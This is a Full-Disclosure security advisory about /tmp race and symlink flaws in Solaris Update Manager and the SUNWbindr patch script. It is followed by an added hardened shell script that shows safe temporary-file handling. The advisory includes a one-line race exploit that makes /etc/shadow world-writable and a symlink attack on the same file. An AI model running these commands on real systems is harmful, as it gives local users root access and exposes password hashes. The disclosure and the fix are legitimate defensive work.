
[Full-disclosure] file clobbering vulnerability in Solaris update manager & local root with SUNWbindr install.



+= Local Root

If the system administrator is updating the system using Update Manager or smpatch (multi-user mode), a race condition exists in the postinstall script for SUNWbindr that may lead to arbitrary code execution as root if the race is won.

vulnerable code in:

  ./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE
  ./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE

vulnerable code:

  UPGRADE=${TMP}/BIND_UPGRADE
  rm -f $UPGRADE

  (If I create the file first between these two steps, I should have
  ownership before it is overwritten and inject malicious code to get
  root.)

  cat >> $UPGRADE <<-\_UPDATE_START_METHOD
  oset=$@ # Remember current options if any.
  svc="svc:network/dns/server"
  if [ -z "$TMP" ]; then
      TMP="/tmp"
  fi

If the following is run:

  while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done

during patch installation, you can get /etc/shadow world writeable.

+= File Clobbering Vulnerability

Noticed this during routine patching.

/tmp file clobbering vulnerability in Sun Update Manager.
7/15/2012

If Solaris Update Manager is run by root and a malicious user creates a symlink in /tmp:

  larry@n1caragua:/tmp$ ln -s /etc/shadow  com.sun.swup.client.LOCK

  larry@n1caragua:/tmp$ ls -l /etc/shadow
  -r--------   1 root     sys          0 Jul 19 18:49 /etc/shadow

  SunOS n1caragua 5.10 Generic_147441-19 i86pc i386 i86pc
  larry@n1caragua:~$

truss output:

  4841/2:         stat64("/tmp/com.sun.swup.client.LOCK", 0xD03FEAB0) = 0
  4841/2:         open64("/tmp/com.sun.swup.client.LOCK", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 5

Larry W. Cashdollar
http://vapid.dhs.org
@lcashdol
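Both issues above share one root cause: a privileged process uses a fixed, predictable name in the world-writable /tmp (BIND_UPGRADE written after an `rm -f`, and com.sun.swup.client.LOCK opened with O_CREAT|O_TRUNC), so any local user can pre-create or symlink the name. The following is an added example, not code from the advisory or from Sun's patch scripts, showing how a postinstall-style script can do the same work safely in POSIX sh. The function names (make_private_scratch, write_new_file, scratch_is_private) and the bind_upgrade.XXXXXX template are my own; the file content written is the `svc=` line quoted from the vulnerable script.

```shell
#!/bin/sh
# Added example (not part of the original advisory): a hardened replacement for
# the "UPGRADE=${TMP}/BIND_UPGRADE; rm -f $UPGRADE; cat >> $UPGRADE" pattern.
# Function names and the mktemp template are hypothetical.

# Create the scratch file inside a fresh directory that mktemp(1) creates
# atomically with a random name and mode 0700. Nobody else can plant a file or
# a symlink at a name inside a directory that did not exist a moment ago, so
# the "win the race between rm -f and cat >>" window from the advisory is gone.
make_private_scratch() {
    _dir=$(mktemp -d "${TMPDIR:-/tmp}/bind_upgrade.XXXXXX") || return 1
    printf '%s/UPGRADE\n' "$_dir"
}

# Write content to a path that must not exist yet.  The -L/-e check refuses a
# symlink planted at the name (the /etc/shadow trick above) and noclobber
# (set -C) turns a plain '>' into create-only, so an existing file is never
# truncated.  Returns 0 on success, 1 if the path exists, 2 on write error.
write_new_file() {
    _path=$1
    _content=$2
    if [ -L "$_path" ] || [ -e "$_path" ]; then
        echo "refusing to write: $_path already exists" >&2
        return 1
    fi
    ( set -C; printf '%s\n' "$_content" > "$_path" ) 2>/dev/null || return 2
}

# Sanity check before using a scratch path: not a symlink, and its parent is a
# directory owned by the current user with no group/other permission bits.
scratch_is_private() {
    _path=$1
    _parent=$(dirname "$_path")
    [ ! -L "$_path" ] || return 1
    [ -d "$_parent" ] || return 1
    # First ten characters of ls -ld are the type and mode, e.g. drwx------.
    _mode=$(ls -ld "$_parent" | cut -c1-10)
    [ "$_mode" = "drwx------" ] || return 1
    _owner=$(ls -ld "$_parent" | awk '{print $3}')
    [ "$_owner" = "$(id -un)" ] || return 1
}

# Stand-alone demonstration: build the scratch file the safe way, then show
# that a second write to the same name and a write to a planted symlink are
# both refused.
if [ "${0##*/}" = "safe_scratch.sh" ]; then
    f=$(make_private_scratch) || exit 1
    scratch_is_private "$f" || exit 1
    write_new_file "$f" 'svc="svc:network/dns/server"' || exit 1
    write_new_file "$f" "second write" && echo "BUG: clobbered $f"
    rm -rf "$(dirname "$f")"
fi
```

Usage note: the important change is not the `-L` test, which is itself racy against a fast attacker, but that every write lands inside a directory the script created privately. The advisory ties the race to patching in multi-user mode, where other users' processes can reach /tmp at the same time; a private 0700 directory removes that shared surface regardless of run level.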
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/